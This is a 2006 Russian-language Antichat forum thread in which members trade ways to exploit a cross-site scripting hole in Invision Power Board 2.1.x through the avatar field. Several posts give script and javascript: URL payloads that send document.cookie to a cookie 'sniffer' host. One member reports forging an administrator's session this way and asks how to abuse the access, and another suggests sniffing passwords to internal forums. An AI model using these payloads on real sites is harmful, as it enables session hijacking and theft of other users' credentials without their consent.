HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 30.05.2006, 17:01
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
С нами: 10946149

Репутация: 116


Post

Возможно можно стырить куки.
Уж это то тут точно есть.
Просто всесто алерта надо отсылку на сниффер вписать.
Попробуй например:
Код:
<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>
 
Ответить с цитированием

  #12  
Старый 01.06.2006, 00:49
nix
Banned
Регистрация: 07.05.2006
Сообщений: 36
С нами: 10532793

Репутация: -9
По умолчанию

че за бред !!!!!!! пишу :
javascript:x=document.cookie%3Bimg=new%20Image()%3 Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif
мне говорит :
Не выбрано ни одного аватара. Вернитесь назад и исправьте ошибку. !!!!!!!!!!!!!!!!!
версия форума - v2.1.6
пробол в 2.14 тож непашет !!!!!!!!!!!!!!!!!!!
 
Ответить с цитированием

  #13  
Старый 01.06.2006, 09:50
nytros
Новичок
Регистрация: 05.01.2006
Сообщений: 29
С нами: 10707720

Репутация: 0
По умолчанию

Для 2.1.4 есть другая уязвимость на форум античата.Поисчи и попробуй на 2.1.6..
 
Ответить с цитированием

  #14  
Старый 03.06.2006, 09:23
bab3pack
Новичок
Регистрация: 01.06.2006
Сообщений: 4
С нами: 10496019

Репутация: 0
По умолчанию

Через аватар реально работает
Но стырил куки, подделал, зашел как админ, ..... что дальше?

Последний раз редактировалось bab3pack; 03.06.2006 в 10:22..
 
Ответить с цитированием

  #15  
Старый 03.06.2006, 10:57
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
С нами: 10946149

Репутация: 116


По умолчанию

А ничего
Соль не даст расшифровать.
Кстати...
Подмена странички работает через аватару?
По идее должна. Не проверял.
 
Ответить с цитированием

  #16  
Старый 03.06.2006, 12:02
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами: 11200586

Репутация: 1398


По умолчанию

Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Вот в коде img.src = "http://" Заменю ссылку на свой снифер и используй куки. Если фильтрует кавычки и т.д,то используй программу URI crypter, чтобы закодировать те символы которые фильтруються!
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #17  
Старый 04.06.2006, 19:38
bab3pack
Новичок
Регистрация: 01.06.2006
Сообщений: 4
С нами: 10496019

Репутация: 0
По умолчанию

я ж говорю, через аватар работает. На данный момент у меня есть подделанный куки админа форума, но расшифровать куки без соли нельзя, вопрос в другом, можно ли каким-нибудь образом использовать то, что логинюсь под админом? хоть какие идеи есть?

Например, можно ли как-нибудь использовать права админа на добавление в календарь какого-нить события и т.д.

Последний раз редактировалось bab3pack; 04.06.2006 в 20:08..
 
Ответить с цитированием

  #18  
Старый 05.06.2006, 19:26
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
С нами: 10946149

Репутация: 116


По умолчанию

Думаю да.
Можно ещё отсниффать пароли к внутренним форумам и полазать по ним.
Зависит от настроек форума.
 
Ответить с цитированием

  #19  
Старый 07.06.2006, 19:30
kulhacker
Новичок
Регистрация: 03.05.2006
Сообщений: 3
С нами: 10538022

Репутация: 0
По умолчанию

Ну а как тогда быть, если нет возможности загрузить аватар с другого адреса?
Если ацкий админ выключил в админке эту возможность?
 
Ответить с цитированием

  #20  
Старый 07.06.2006, 19:53
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
С нами: 10531106

Репутация: 354


По умолчанию

Ладно пацан я хочу тебе сказать что существует сайт который как-раз подходит к решению и к решению любой проблемы связаной с Уязвимостью . Этот сайт называется securityfocus.
Зайди сюда:http://www.securityfocus.com/vulnerabilities
найди invision power services потом в нижнем окне напиши invision power board и вследущем окне выбири версию форума.

Надеюсь я тебе помог.
dracula4ever
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости Ipb 2.1.6 - есть вопрос spheere Уязвимости CMS / форумов 0 27.05.2006 21:16
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36
Множественные уязвимости в INVISION POWER BOARD 2.1.x dinar_007 Мировые новости. Обсуждения. 12 25.02.2006 18:32
Взлом wmshop Xalegi Уязвимости 0 29.11.2004 01:44
Вопрос про уязвимости в Invision power board =>v2.0.0 Уязвимости CMS / форумов 5 27.10.2004 19:59



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.